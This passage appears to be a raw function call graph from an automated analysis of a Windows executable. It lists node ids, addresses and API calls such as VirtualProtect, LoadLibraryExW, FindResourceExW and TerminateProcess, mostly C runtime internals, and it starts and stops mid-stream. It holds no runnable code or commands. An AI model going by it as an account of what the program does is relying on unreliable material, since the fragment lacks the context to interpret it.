101751->101744 101752->101744 101753->101729 101754->101744 101755->101744 101756->101738 101757->101740 101758->101729 101760 329837 84 API calls 101759->101760 101761 39cb1a 101760->101761 101781 39cb61 Mailbox 101761->101781 101797 39d7a5 101761->101797 101763 39cdb9 101764 39cf2e 101763->101764 101768 39cdc7 101763->101768 101846 39d8c8 92 API calls Mailbox 101764->101846 101767 39cf3d 101767->101768 101769 39cf49 101767->101769 101810 39c96e 101768->101810 101769->101781 101770 329837 84 API calls 101775 39cbb2 Mailbox 101770->101775 101775->101763 101775->101770 101775->101781 101829 39fbce 59 API calls 2 library calls 101775->101829 101830 39cfdf 61 API calls 2 library calls 101775->101830 101776 39ce00 101825 340c08 101776->101825 101779 39ce1a 101831 389e4a 89 API calls 4 library calls 101779->101831 101780 39ce33 101832 3292ce 101780->101832 101781->101632 101784 39ce25 GetCurrentProcess TerminateProcess 101784->101780 101789 39cfa4 101789->101781 101792 39cfb8 FreeLibrary 101789->101792 101790 39ce6b 101844 39d649 107 API calls _free 101790->101844 101792->101781 101795 329d3c 60 API calls 101796 39ce7c 101795->101796 101796->101789 101796->101795 101845 328d40 59 API calls Mailbox 101796->101845 101847 39d649 107 API calls _free 101796->101847 101798 327e4f 59 API calls 101797->101798 101799 39d7c0 CharLowerBuffW 101798->101799 101848 37f167 101799->101848 101803 327667 59 API calls 101804 39d7f9 101803->101804 101855 32784b 101804->101855 101806 39d810 101808 327d2c 59 API calls 101806->101808 101807 39d858 Mailbox 101807->101775 101809 39d81c Mailbox 101808->101809 101809->101807 101868 39cfdf 61 API calls 2 library calls 101809->101868 101811 39c989 101810->101811 101815 39c9de 101810->101815 101812 340db6 Mailbox 59 API calls 101811->101812 101814 39c9ab 101812->101814 101813 340db6 Mailbox 59 API calls 101813->101814 101814->101813 101814->101815 101816 39da50 101815->101816 101817 39dc79 Mailbox 101816->101817 101824 39da73 _strcat _wcscpy __wsetenvp 101816->101824 101817->101776 101818 329be6 59 API calls 101818->101824 101819 329b3c 59 API calls 101819->101824 101820 329b98 59 API calls 101820->101824 101821 329837 84 API calls 101821->101824 101822 34571c 58 API calls __malloc_crt 101822->101824 101824->101817 101824->101818 101824->101819 101824->101820 101824->101821 101824->101822 101872 385887 61 API calls 2 library calls 101824->101872 101827 340c1d 101825->101827 101826 340cb5 VirtualProtect 101828 340c83 101826->101828 101827->101826 101827->101828 101828->101779 101828->101780 101829->101775 101830->101775 101831->101784 101833 3292d6 101832->101833 101834 340db6 Mailbox 59 API calls 101833->101834 101835 3292e4 101834->101835 101836 3292f0 101835->101836 101873 3291fc 101835->101873 101838 329050 101836->101838 101876 329160 101838->101876 101840 32905f 101841 340db6 Mailbox 59 API calls 101840->101841 101842 3290fb 101840->101842 101841->101842 101842->101796 101843 328d40 59 API calls Mailbox 101842->101843 101843->101790 101844->101796 101845->101796 101846->101767 101847->101796 101850 37f192 __wsetenvp 101848->101850 101849 37f1d1 101849->101803 101849->101809 101850->101849 101851 37f278 101850->101851 101854 37f1c7 101850->101854 101851->101849 101870 3278c4 61 API calls 101851->101870 101854->101849 101869 3278c4 61 API calls 101854->101869 101856 3278b7 101855->101856 101857 32785a 101855->101857 101859 327d2c 59 API calls 101856->101859 101857->101856 101858 327865 101857->101858 101860 327880 101858->101860 101861 35eb09 101858->101861 101865 327888 _memmove 101859->101865 101871 327f27 59 API calls Mailbox 101860->101871 101862 328029 59 API calls 101861->101862 101864 35eb13 101862->101864 101866 340db6 Mailbox 59 API calls 101864->101866 101865->101806 101867 35eb33 101866->101867 101868->101807 101869->101854 101870->101851 101871->101865 101872->101824 101874 340db6 Mailbox 59 API calls 101873->101874 101875 329209 101874->101875 101875->101836 101877 329169 Mailbox 101876->101877 101878 35f19f 101877->101878 101883 329173 101877->101883 101879 340db6 Mailbox 59 API calls 101878->101879 101881 35f1ab 101879->101881 101880 32917a 101880->101840 101882 329c90 Mailbox 59 API calls 101882->101883 101883->101880 101883->101882 101885 3453b2 __write 101884->101885 101886 3453c6 101885->101886 101887 3453de 101885->101887 101919 348b28 58 API calls __getptd_noexit 101886->101919 101893 3453d6 __write 101887->101893 101897 346c11 101887->101897 101890 3453cb 101920 348db6 9 API calls __write 101890->101920 101893->101636 101898 346c21 101897->101898 101899 346c43 EnterCriticalSection 101897->101899 101898->101899 101900 346c29 101898->101900 101901 3453f0 101899->101901 101902 349c0b __lock 58 API calls 101900->101902 101903 34533a 101901->101903 101902->101901 101904 34535d 101903->101904 101905 345349 101903->101905 101906 345359 101904->101906 101922 344a3d 101904->101922 101965 348b28 58 API calls __getptd_noexit 101905->101965 101921 345415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101906->101921 101909 34534e 101966 348db6 9 API calls __write 101909->101966 101915 345377 101939 350a02 101915->101939 101917 34537d 101917->101906 101918 342d55 _free 58 API calls 101917->101918 101918->101906 101919->101890 101920->101893 101921->101893 101923 344a50 101922->101923 101927 344a74 101922->101927 101924 3446e6 __fseek_nolock 58 API calls 101923->101924 101923->101927 101925 344a6d 101924->101925 101967 34d886 101925->101967 101928 350b77 101927->101928 101929 345371 101928->101929 101930 350b84 101928->101930 101932 3446e6 101929->101932 101930->101929 101931 342d55 _free 58 API calls 101930->101931 101931->101929 101933 344705 101932->101933 101934 3446f0 101932->101934 101933->101915 102109 348b28 58 API calls __getptd_noexit 101934->102109 101936 3446f5 102110 348db6 9 API calls __write 101936->102110 101938 344700 101938->101915 101940 350a0e __write 101939->101940 101941 350a32 101940->101941 101942 350a1b 101940->101942 101943 350abd 101941->101943 101945 350a42 101941->101945 102126 348af4 58 API calls __getptd_noexit 101942->102126 102131 348af4 58 API calls __getptd_noexit 101943->102131 101948 350a60 101945->101948 101949 350a6a 101945->101949 101947 350a20 102127 348b28 58 API calls __getptd_noexit 101947->102127 102128 348af4 58 API calls __getptd_noexit 101948->102128 101953 34d206 ___lock_fhandle 59 API calls 101949->101953 101950 350a65 102132 348b28 58 API calls __getptd_noexit 101950->102132 101955 350a70 101953->101955 101957 350a83 101955->101957 101958 350a8e 101955->101958 101956 350ac9 102133 348db6 9 API calls __write 101956->102133 102111 350add 101957->102111 102129 348b28 58 API calls __getptd_noexit 101958->102129 101961 350a27 __write 101961->101917 101963 350a89 102130 350ab5 LeaveCriticalSection __unlock_fhandle 101963->102130 101965->101909 101966->101906 101968 34d892 __write 101967->101968 101969 34d8b6 101968->101969 101970 34d89f 101968->101970 101972 34d955 101969->101972 101974 34d8ca 101969->101974 102068 348af4 58 API calls __getptd_noexit 101970->102068 102074 348af4 58 API calls __getptd_noexit 101972->102074 101973 34d8a4 102069 348b28 58 API calls __getptd_noexit 101973->102069 101977 34d8f2 101974->101977 101978 34d8e8 101974->101978 101995 34d206 101977->101995 102070 348af4 58 API calls __getptd_noexit 101978->102070 101979 34d8ed 102075 348b28 58 API calls __getptd_noexit 101979->102075 101982 34d8f8 101984 34d91e 101982->101984 101985 34d90b 101982->101985 102071 348b28 58 API calls __getptd_noexit 101984->102071 102004 34d975 101985->102004 101986 34d961 102076 348db6 9 API calls __write 101986->102076 101990 34d8ab __write 101990->101927 101991 34d917 102073 34d94d LeaveCriticalSection __unlock_fhandle 101991->102073 101992 34d923 102072 348af4 58 API calls __getptd_noexit 101992->102072 101996 34d212 __write 101995->101996 101997 34d261 EnterCriticalSection 101996->101997 101998 349c0b __lock 58 API calls 101996->101998 101999 34d287 __write 101997->101999 102000 34d237 101998->102000 101999->101982 102001 34d24f 102000->102001 102077 349e2b InitializeCriticalSectionAndSpinCount 102000->102077 102078 34d28b LeaveCriticalSection _doexit 102001->102078 102005 34d982 __ftell_nolock 102004->102005 102006 34d9e0 102005->102006 102007 34d9c1 102005->102007 102035 34d9b6 102005->102035 102010 34da38 102006->102010 102011 34da1c 102006->102011 102088 348af4 58 API calls __getptd_noexit 102007->102088 102015 34da51 102010->102015 102094 3518c1 60 API calls 3 library calls 102010->102094 102091 348af4 58 API calls __getptd_noexit 102011->102091 102012 34e1d6 102012->101991 102013 34d9c6 102089 348b28 58 API calls __getptd_noexit 102013->102089 102079 355c6b 102015->102079 102017 34da21 102092 348b28 58 API calls __getptd_noexit 102017->102092 102019 34d9cd 102090 348db6 9 API calls __write 102019->102090 102021 34da5f 102024 34ddb8 102021->102024 102095 3499ac 58 API calls 2 library calls 102021->102095 102026 34ddd6 102024->102026 102027 34e14b WriteFile 102024->102027 102025 34da28 102093 348db6 9 API calls __write 102025->102093 102030 34defa 102026->102030 102038 34ddec 102026->102038 102031 34ddab GetLastError 102027->102031 102036 34dd78 102027->102036 102042 34dfef 102030->102042 102044 34df05 102030->102044 102031->102036 102032 34da8b GetConsoleMode 102032->102024 102034 34daca 102032->102034 102033 34e184 102033->102035 102100 348b28 58 API calls __getptd_noexit 102033->102100 102034->102024 102037 34dada GetConsoleCP 102034->102037 102102 34c5f6 102035->102102 102036->102033 102036->102035 102041 34ded8 102036->102041 102037->102033 102064 34db09 102037->102064 102038->102033 102039 34de5b WriteFile 102038->102039 102039->102031 102043 34de98 102039->102043 102047 34dee3 102041->102047 102048 34e17b 102041->102048 102042->102033 102049 34e064 WideCharToMultiByte 102042->102049 102043->102038 102050 34debc 102043->102050 102044->102033 102051 34df6a WriteFile 102044->102051 102045 34e1b2 102101 348af4 58 API calls __getptd_noexit 102045->102101 102097 348b28 58 API calls __getptd_noexit 102047->102097 102099 348b07 58 API calls 2 library calls 102048->102099 102049->102031 102060 34e0ab 102049->102060 102050->102036 102051->102031 102052 34dfb9 102051->102052 102052->102036 102052->102044 102052->102050 102055 34dee8 102098 348af4 58 API calls __getptd_noexit 102055->102098 102056 34e0b3 WriteFile 102059 34e106 GetLastError 102056->102059 102056->102060 102059->102060 102060->102036 102060->102042 102060->102050 102060->102056 102061 3562ba 60 API calls __write_nolock 102061->102064 102062 34dbf2 WideCharToMultiByte 102062->102036 102063 34dc2d WriteFile 102062->102063 102063->102031 102066 34dc5f 102063->102066 102064->102036 102064->102061 102064->102062 102064->102066 102096 3435f5 58 API calls __isleadbyte_l 102064->102096 102065 357a5e WriteConsoleW CreateFileW __putwch_nolock 102065->102066 102066->102031 102066->102036 102066->102064 102066->102065 102067 34dc87 WriteFile 102066->102067 102067->102031 102067->102066 102068->101973 102069->101990 102070->101979 102071->101992 102072->101991 102073->101990 102074->101979 102075->101986 102076->101990 102077->102001 102078->101997 102080 355c76 102079->102080 102081 355c83 102079->102081 102082 348b28 __write 58 API calls 102080->102082 102084 355c8f 102081->102084 102085 348b28 __write 58 API calls 102081->102085 102083 355c7b 102082->102083 102083->102021 102084->102021 102086 355cb0 102085->102086 102087 348db6 __write 9 API calls 102086->102087 102087->102083 102088->102013 102089->102019 102090->102035 102091->102017 102092->102025 102093->102035 102094->102015 102095->102032 102096->102064 102097->102055 102098->102035 102099->102035 102100->102045 102101->102035 102103 34c600 IsProcessorFeaturePresent 102102->102103 102104 34c5fe 102102->102104 102106 35590a 102103->102106 102104->102012 102107 3558b9 ___raise_securityfailure 5 API calls 102106->102107 102108 3559ed 102107->102108 102108->102012 102109->101936 102110->101938 102134 34d4c3 102111->102134 102113 350aeb 102114 350b41 102113->102114 102118 34d4c3 __commit 58 API calls 102113->102118 102125 350b1f 102113->102125 102147 34d43d 59 API calls __write 102114->102147 102116 34d4c3 __commit 58 API calls 102120 350b2b CloseHandle 102116->102120 102117 350b49 102121 350b6b 102117->102121 102148 348b07 58 API calls 2 library calls 102117->102148 102119 350b16 102118->102119 102122 34d4c3 __commit 58 API calls 102119->102122 102120->102114 102123 350b37 GetLastError 102120->102123 102121->101963 102122->102125 102123->102114 102125->102114 102125->102116 102126->101947 102127->101961 102128->101950 102129->101963 102130->101961 102131->101950 102132->101956 102133->101961 102135 34d4e3 102134->102135 102136 34d4ce 102134->102136 102140 34d508 102135->102140 102151 348af4 58 API calls __getptd_noexit 102135->102151 102149 348af4 58 API calls __getptd_noexit 102136->102149 102139 34d4d3 102150 348b28 58 API calls __getptd_noexit 102139->102150 102140->102113 102141 34d512 102152 348b28 58 API calls __getptd_noexit 102141->102152 102144 34d4db 102144->102113 102145 34d51a 102153 348db6 9 API calls __write 102145->102153 102147->102117 102148->102121 102149->102139 102150->102144 102151->102141 102152->102145 102153->102144 102344 324bb5 102154->102344 102159 35d8e6 102161 324e4a 84 API calls 102159->102161 102160 324e08 LoadLibraryExW 102354 324b6a 102160->102354 102163 35d8ed 102161->102163 102165 324b6a 3 API calls 102163->102165 102167 35d8f5 102165->102167 102380 324f0b 102167->102380 102168 324e2f 102168->102167 102169 324e3b 102168->102169 102170 324e4a 84 API calls 102169->102170 102172 324e40 102170->102172 102172->101655 102172->101657 102175 35d91c 102388 324ec7 102175->102388 102179 327667 59 API calls 102178->102179 102180 3245b1 102179->102180 102181 327667 59 API calls 102180->102181 102182 3245b9 102181->102182 102183 327667 59 API calls 102182->102183 102184 3245c1 102183->102184 102185 327667 59 API calls 102184->102185 102186 3245c9 102185->102186 102187 35d4d2 102186->102187 102188 3245fd 102186->102188 102189 328047 59 API calls 102187->102189 102190 32784b 59 API calls 102188->102190 102191 35d4db 102189->102191 102192 32460b 102190->102192 102662 327d8c 102191->102662 102194 327d2c 59 API calls 102192->102194 102195 324615 102194->102195 102196 324640 102195->102196 102197 32784b 59 API calls 102195->102197 102198 324680 102196->102198 102200 32465f 102196->102200 102211 35d4fb 102196->102211 102201 324636 102197->102201 102199 32784b 59 API calls 102198->102199 102202 324691 102199->102202 102205 3279f2 59 API calls 102200->102205 102204 327d2c 59 API calls 102201->102204 102206 3246a3 102202->102206 102209 328047 59 API calls 102202->102209 102203 35d5cb 102207 327bcc 59 API calls 102203->102207 102204->102196 102208 324669 102205->102208 102210 3246b3 102206->102210 102212 328047 59 API calls 102206->102212 102218 35d588 102207->102218 102208->102198 102215 32784b 59 API calls 102208->102215 102209->102206 102214 3246ba 102210->102214 102216 328047 59 API calls 102210->102216 102211->102203 102213 35d5b4 102211->102213 102220 35d532 102211->102220 102212->102210 102213->102203 102221 35d59f 102213->102221 102217 328047 59 API calls 102214->102217 102223 3246c1 Mailbox 102214->102223 102215->102198 102216->102214 102217->102223 102218->102198 102219 3279f2 59 API calls 102218->102219 102666 327924 59 API calls 2 library calls 102218->102666 102219->102218 102222 35d590 102220->102222 102227 35d57b 102220->102227 102225 327bcc 59 API calls 102221->102225 102224 327bcc 59 API calls 102222->102224 102223->101687 102224->102218 102225->102218 102228 327bcc 59 API calls 102227->102228 102228->102218 102230 327e4f 59 API calls 102229->102230 102231 3279fd 102230->102231 102231->101694 102231->101696 102233 38408d 102232->102233 102234 3840a0 102233->102234 102235 384092 102233->102235 102237 327667 59 API calls 102234->102237 102236 328047 59 API calls 102235->102236 102285 38409b Mailbox 102236->102285 102238 3840a8 102237->102238 102239 327667 59 API calls 102238->102239 102240 3840b0 102239->102240 102241 327667 59 API calls 102240->102241 102242 3840bb 102241->102242 102243 327667 59 API calls 102242->102243 102244 3840c3 102243->102244 102245 327667 59 API calls 102244->102245 102246 3840cb 102245->102246 102247 327667 59 API calls 102246->102247 102248 3840d3 102247->102248 102249 327667 59 API calls 102248->102249 102250 3840db 102249->102250 102251 327667 59 API calls 102250->102251 102252 3840e3 102251->102252 102253 32459b 59 API calls 102252->102253 102254 3840fa 102253->102254 102255 32459b 59 API calls 102254->102255 102256 384113 102255->102256 102257 3279f2 59 API calls 102256->102257 102258 38411f 102257->102258 102259 384132 102258->102259 102260 327d2c 59 API calls 102258->102260 102261 3279f2 59 API calls 102259->102261 102260->102259 102262 38413b 102261->102262 102263 38414b 102262->102263 102264 327d2c 59 API calls 102262->102264 102265 328047 59 API calls 102263->102265 102264->102263 102266 384157 102265->102266 102267 327b2e 59 API calls 102266->102267 102268 384163 102267->102268 102667 384223 59 API calls 102268->102667 102270 384172 102668 384223 59 API calls 102270->102668 102272 384185 102273 3279f2 59 API calls 102272->102273 102274 38418f 102273->102274 102275 384194 102274->102275 102276 3841a6 102274->102276 102285->101711 102287 389162 __ftell_nolock 102286->102287 102288 340db6 Mailbox 59 API calls 102287->102288 102289 3891bf 102288->102289 102290 32522e 59 API calls 102289->102290 102291 3891c9 102290->102291 102292 388f5f GetSystemTimeAsFileTime 102291->102292 102293 3891d4 102292->102293 102294 324ee5 85 API calls 102293->102294 102295 3891e7 _wcscmp 102294->102295 102296 3892b8 102295->102296 102297 38920b 102295->102297 102298 389734 96 API calls 102296->102298 102686 389734 102297->102686 102314 389284 _wcscat 102298->102314 102302 324f0b 74 API calls 102303 3892dd 102302->102303 102305 324f0b 74 API calls 102303->102305 102304 3892c1 102304->101718 102307 3892ed 102305->102307 102306 389239 _wcscat _wcscpy 102693 3440fb 58 API calls __wsplitpath_helper 102306->102693 102308 324f0b 74 API calls 102307->102308 102310 389308 102308->102310 102311 324f0b 74 API calls 102310->102311 102312 389318 102311->102312 102313 324f0b 74 API calls 102312->102313 102315 389333 102313->102315 102314->102302 102314->102304 102316 324f0b 74 API calls 102315->102316 102317 389343 102316->102317 102318 324f0b 74 API calls 102317->102318 102319 389353 102318->102319 102320 324f0b 74 API calls 102319->102320 102321 389363 102320->102321 102669 3898e3 GetTempPathW GetTempFileNameW 102321->102669 102341->101644 102342->101680 102343->101693 102393 324c03 102344->102393 102347 324c03 2 API calls 102350 324bdc 102347->102350 102348 324bf5 102351 34525b 102348->102351 102349 324bec FreeLibrary 102349->102348 102350->102348 102350->102349 102397 345270 102351->102397 102353 324dfc 102353->102159 102353->102160 102478 324c36 102354->102478 102357 324c36 2 API calls 102360 324b8f 102357->102360 102358 324ba1 FreeLibrary 102359 324baa 102358->102359 102361 324c70 102359->102361 102360->102358 102360->102359 102362 340db6 Mailbox 59 API calls 102361->102362 102363 324c85 102362->102363 102482 32522e 102363->102482 102365 324c91 _memmove 102366 324ccc 102365->102366 102367 324dc1 102365->102367 102368 324d89 102365->102368 102369 324ec7 69 API calls 102366->102369 102496 38991b 95 API calls 102367->102496 102485 324e89 CreateStreamOnHGlobal 102368->102485 102377 324cd5 102369->102377 102372 324f0b 74 API calls 102372->102377 102373 324d69 102373->102168 102375 35d8a7 102376 324ee5 85 API calls 102375->102376 102378 35d8bb 102376->102378 102377->102372 102377->102373 102377->102375 102491 324ee5 102377->102491 102379 324f0b 74 API calls 102378->102379 102379->102373 102381 35d9cd 102380->102381 102382 324f1d 102380->102382 102514 3455e2 102382->102514 102385 389109 102639 388f5f 102385->102639 102387 38911f 102387->102175 102389 324ed6 102388->102389 102390 35d990 102388->102390 102644 345c60 102389->102644 102392 324ede 102394 324bd0 102393->102394 102395 324c0c LoadLibraryA 102393->102395 102394->102347 102394->102350 102395->102394 102396 324c1d GetProcAddress 102395->102396 102396->102394 102400 34527c __write 102397->102400 102398 34528f 102446 348b28 58 API calls __getptd_noexit 102398->102446 102400->102398 102402 3452c0 102400->102402 102401 345294 102447 348db6 9 API calls __write 102401->102447 102416 3504e8 102402->102416 102405 3452c5 102406 3452ce 102405->102406 102407 3452db 102405->102407 102448 348b28 58 API calls __getptd_noexit 102406->102448 102408 345305 102407->102408 102409 3452e5 102407->102409 102431 350607 102408->102431 102449 348b28 58 API calls __getptd_noexit 102409->102449 102413 34529f __write @_EH4_CallFilterFunc@8 102413->102353 102417 3504f4 __write 102416->102417 102418 349c0b __lock 58 API calls 102417->102418 102419 350502 102418->102419 102420 35057d 102419->102420 102426 349c93 __mtinitlocknum 58 API calls 102419->102426 102429 350576 102419->102429 102454 346c50 59 API calls __lock 102419->102454 102455 346cba LeaveCriticalSection LeaveCriticalSection _doexit 102419->102455 102456 34881d 58 API calls __malloc_crt 102420->102456 102423 350584 102423->102429 102457 349e2b InitializeCriticalSectionAndSpinCount 102423->102457 102424 3505f3 __write 102424->102405 102426->102419 102428 3505aa EnterCriticalSection 102428->102429 102451 3505fe 102429->102451 102432 350627 __wopenfile 102431->102432 102433 350641 102432->102433 102445 3507fc 102432->102445 102464 3437cb 60 API calls 2 library calls 102432->102464 102462 348b28 58 API calls __getptd_noexit 102433->102462 102435 350646 102463 348db6 9 API calls __write 102435->102463 102437 35085f 102459 3585a1 102437->102459 102439 345310 102450 345332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102439->102450 102441 3507f5 102441->102445 102465 3437cb 60 API calls 2 library calls 102441->102465 102443 350814 102443->102445 102466 3437cb 60 API calls 2 library calls 102443->102466 102445->102433 102445->102437 102446->102401 102447->102413 102448->102413 102449->102413 102450->102413 102458 349d75 LeaveCriticalSection 102451->102458 102453 350605 102453->102424 102454->102419 102455->102419 102456->102423 102457->102428 102458->102453 102467 357d85 102459->102467 102461 3585ba 102461->102439 102462->102435 102463->102439 102464->102441 102465->102443 102466->102445 102468 357d91 __write 102467->102468 102469 357da7 102468->102469 102471 357ddd 102468->102471 102470 348b28 __write 58 API calls 102469->102470 102472 357dac 102470->102472 102473 357e4e __wsopen_nolock 109 API calls 102471->102473 102474 348db6 __write 9 API calls 102472->102474 102475 357df9 102473->102475 102477 357db6 __write 102474->102477 102476 357e22 __wsopen_helper LeaveCriticalSection 102475->102476 102476->102477 102477->102461 102479 324b83 102478->102479 102480 324c3f LoadLibraryA 102478->102480 102479->102357 102479->102360 102480->102479 102481 324c50 GetProcAddress 102480->102481 102481->102479 102483 340db6 Mailbox 59 API calls 102482->102483 102484 325240 102483->102484 102484->102365 102486 324ea3 FindResourceExW 102485->102486 102487 324ec0 102485->102487 102486->102487 102488 35d933 LoadResource 102486->102488 102487->102366 102488->102487 102489 35d948 SizeofResource 102488->102489 102489->102487 102490 35d95c LockResource 102489->102490 102490->102487 102492 324ef4 102491->102492 102493 35d9ab 102491->102493 102497 34584d 102492->102497 102495 324f02 102495->102377 102496->102366 102500 345859 __write 102497->102500 102498 34586b 102510 348b28 58 API calls __getptd_noexit 102498->102510 102500->102498 102501 345891 102500->102501 102503 346c11 __lock_file 59 API calls 102501->102503 102502 345870 102511 348db6 9 API calls __write 102502->102511 102505 345897 102503->102505 102512 3457be 83 API calls 4 library calls 102505->102512 102506 34587b __write 102506->102495 102508 3458a6 102513 3458c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102508->102513 102510->102502 102511->102506 102512->102508 102513->102506 102517 3455fd 102514->102517 102516 324f2e 102516->102385 102518 345609 __write 102517->102518 102519 34564c 102518->102519 102520 34561f _memset 102518->102520 102529 345644 __write 102518->102529 102521 346c11 __lock_file 59 API calls 102519->102521 102544 348b28 58 API calls __getptd_noexit 102520->102544 102522 345652 102521->102522 102530 34541d 102522->102530 102525 345639 102545 348db6 9 API calls __write 102525->102545 102529->102516 102531 345453 102530->102531 102535 345438 _memset 102530->102535 102546 345686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102531->102546 102532 345443 102635 348b28 58 API calls __getptd_noexit 102532->102635 102534 345493 102534->102531 102538 3455a4 _memset 102534->102538 102540 3446e6 __fseek_nolock 58 API calls 102534->102540 102547 350e5b 102534->102547 102615 350ba7 102534->102615 102637 350cc8 58 API calls 3 library calls 102534->102637 102535->102531 102535->102532 102535->102534 102638 348b28 58 API calls __getptd_noexit 102538->102638 102540->102534 102542 345448 102636 348db6 9 API calls __write 102542->102636 102544->102525 102545->102529 102546->102529 102548 350e93 102547->102548 102549 350e7c 102547->102549 102550 3515cb 102548->102550 102555 350ecd 102548->102555 102551 348af4 __write 58 API calls 102549->102551 102552 348af4 __write 58 API calls 102550->102552 102553 350e81 102551->102553 102556 3515d0 102552->102556 102554 348b28 __write 58 API calls 102553->102554 102561 350e88 102554->102561 102557 350ed5 102555->102557 102565 350eec 102555->102565 102558 348b28 __write 58 API calls 102556->102558 102559 348af4 __write 58 API calls 102557->102559 102560 350ee1 102558->102560 102562 350eda 102559->102562 102563 348db6 __write 9 API calls 102560->102563 102561->102534 102568 348b28 __write 58 API calls 102562->102568 102563->102561 102564 350f01 102566 348af4 __write 58 API calls 102564->102566 102565->102561 102565->102564 102567 350f1b 102565->102567 102570 350f39 102565->102570 102566->102562 102567->102564 102569 350f26 102567->102569 102568->102560 102572 355c6b __stbuf 58 API calls 102569->102572 102571 34881d __malloc_crt 58 API calls 102570->102571 102573 350f49 102571->102573 102574 35103a 102572->102574 102575 350f51 102573->102575 102576 350f6c 102573->102576 102577 3510b3 ReadFile 102574->102577 102580 351050 GetConsoleMode 102574->102580 102579 348b28 __write 58 API calls 102575->102579 102578 3518c1 __lseeki64_nolock 60 API calls 102576->102578 102581 3510d5 102577->102581 102582 351593 GetLastError 102577->102582 102578->102569 102583 350f56 102579->102583 102586 351064 102580->102586 102587 3510b0 102580->102587 102581->102582 102588 3510a5 102581->102588 102584 3515a0 102582->102584 102591 351093 102582->102591 102585 348af4 __write 58 API calls 102583->102585 102589 348b28 __write 58 API calls 102584->102589 102585->102561 102586->102587 102590 35106a ReadConsoleW 102586->102590 102587->102577 102597 351099 102588->102597 102598 35110a 102588->102598 102601 351377 102588->102601 102592 3515a5 102589->102592 102590->102588 102593 35108d GetLastError 102590->102593 102594 348b07 __dosmaperr 58 API calls 102591->102594 102591->102597 102595 348af4 __write 58 API calls 102592->102595 102593->102591 102594->102597 102595->102597 102596 342d55 _free 58 API calls 102596->102561 102597->102561 102597->102596 102600 351176 ReadFile 102598->102600 102608 3511f7 102598->102608 102603 351197 GetLastError 102600->102603 102613 3511a1 102600->102613 102601->102597 102602 35147d ReadFile 102601->102602 102607 3514a0 GetLastError 102602->102607 102614 3514ae 102602->102614 102603->102613 102604 3512b4 102609 351264 MultiByteToWideChar 102604->102609 102610 3518c1 __lseeki64_nolock 60 API calls 102604->102610 102605 3512a4 102606 348b28 __write 58 API calls 102605->102606 102606->102597 102607->102614 102608->102597 102608->102604 102608->102605 102608->102609 102609->102593 102609->102597 102610->102609 102611 3518c1 __lseeki64_nolock 60 API calls 102611->102613 102612 3518c1 __lseeki64_nolock 60 API calls 102612->102614 102613->102598 102613->102611 102614->102601 102614->102612 102616 350bb2 102615->102616 102619 350bc7 102615->102619 102617 348b28 __write 58 API calls 102616->102617 102618 350bb7 102617->102618 102620 348db6 __write 9 API calls 102618->102620 102621 350bfc 102619->102621 102622 355fe4 __getbuf 58 API calls 102619->102622 102626 350bc2 102619->102626 102620->102626 102623 3446e6 __fseek_nolock 58 API calls 102621->102623 102622->102621 102624 350c10 102623->102624 102625 350d47 __read 72 API calls 102624->102625 102627 350c17 102625->102627 102626->102534 102627->102626 102628 3446e6 __fseek_nolock 58 API calls 102627->102628 102629 350c3a 102628->102629 102629->102626 102630 3446e6 __fseek_nolock 58 API calls 102629->102630 102631 350c46 102630->102631 102631->102626 102632 3446e6 __fseek_nolock 58 API calls 102631->102632 102633 350c53 102632->102633 102634 3446e6 __fseek_nolock 58 API calls 102633->102634 102634->102626 102635->102542 102636->102531 102637->102534 102638->102542 102642 34520a GetSystemTimeAsFileTime 102639->102642 102641 388f6e 102641->102387 102643 345238 __aulldiv 102642->102643 102643->102641 102645 345c6c __write 102644->102645 102646 345c93 102645->102646 102647 345c7e 102645->102647 102648 346c11 __lock_file 59 API calls 102646->102648 102658 348b28 58 API calls __getptd_noexit 102647->102658 102650 345c99 102648->102650 102660 3458d0 67 API calls 5 library calls 102650->102660 102651 345c83 102659 348db6 9 API calls __write 102651->102659 102654 345ca4 102661 345cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102654->102661 102656 345cb6 102657 345c8e __write 102656->102657 102657->102392 102658->102651 102659->102657 102660->102654 102661->102656 102663 327da6 102662->102663 102665 327d99 102662->102665 102664 340db6 Mailbox 59 API calls 102663->102664 102664->102665 102665->102196 102666->102218 102667->102270 102668->102272 102688 389748 __tzset_nolock _wcscmp 102686->102688 102687 324f0b 74 API calls 102687->102688 102688->102687 102689 389109 GetSystemTimeAsFileTime 102688->102689 102690 389210 102688->102690 102691 324ee5 85 API calls 102688->102691 102689->102688 102690->102304 102692 3440fb 58 API calls __wsplitpath_helper 102690->102692 102691->102688 102692->102306 102693->102314 102786 383c3e 102785->102786 102787 384475 FindFirstFileW 102785->102787 102786->101474 102787->102786 102788 38448a FindClose 102787->102788 102788->102786 102789->101501 102790->101498 102791->101361 102792->101388 102793->101388 102794->101383 102795->101391 102796->101395 102797->101391 102798->101400 102799->101424 102800 347c56 102801 347c62 __write 102800->102801 102837 349e08 GetStartupInfoW 102801->102837 102803 347c67 102839 348b7c GetProcessHeap 102803->102839 102805 347cbf 102806 347cca 102805->102806 102922 347da6 58 API calls 3 library calls 102805->102922 102840 349ae6 102806->102840 102809 347cd0 102810 347cdb __RTC_Initialize 102809->102810 102923 347da6 58 API calls 3 library calls 102809->102923 102861 34d5d2 102810->102861 102813 347cea 102814 347cf6 GetCommandLineW 102813->102814 102924 347da6 58 API calls 3 library calls 102813->102924 102880 354f23 GetEnvironmentStringsW 102814->102880 102817 347cf5 102817->102814 102820 347d10 102823 347d1b 102820->102823 102925 3430b5 58 API calls 3 library calls 102820->102925 102890 354d58 102823->102890 102824 347d21 102825 347d2c 102824->102825 102926 3430b5 58 API calls 3 library calls 102824->102926 102904 3430ef 102825->102904 102828 347d34 102829 347d3f __wwincmdln 102828->102829 102927 3430b5 58 API calls 3 library calls 102828->102927 102910 3247d0 102829->102910 102832 347d53 102833 347d62 102832->102833 102928 343358 58 API calls _doexit 102832->102928 102929 3430e0 58 API calls _doexit 102833->102929 102836 347d67 __write 102838 349e1e 102837->102838 102838->102803 102839->102805 102930 343187 36 API calls 2 library calls 102840->102930 102842 349aeb 102931 349d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 102842->102931 102844 349af0 102845 349af4 102844->102845 102933 349d8a TlsAlloc 102844->102933 102932 349b5c 61 API calls 2 library calls 102845->102932 102848 349af9 102848->102809 102849 349b06 102849->102845 102850 349b11 102849->102850 102934 3487d5 102850->102934 102853 349b53 102942 349b5c 61 API calls 2 library calls 102853->102942 102856 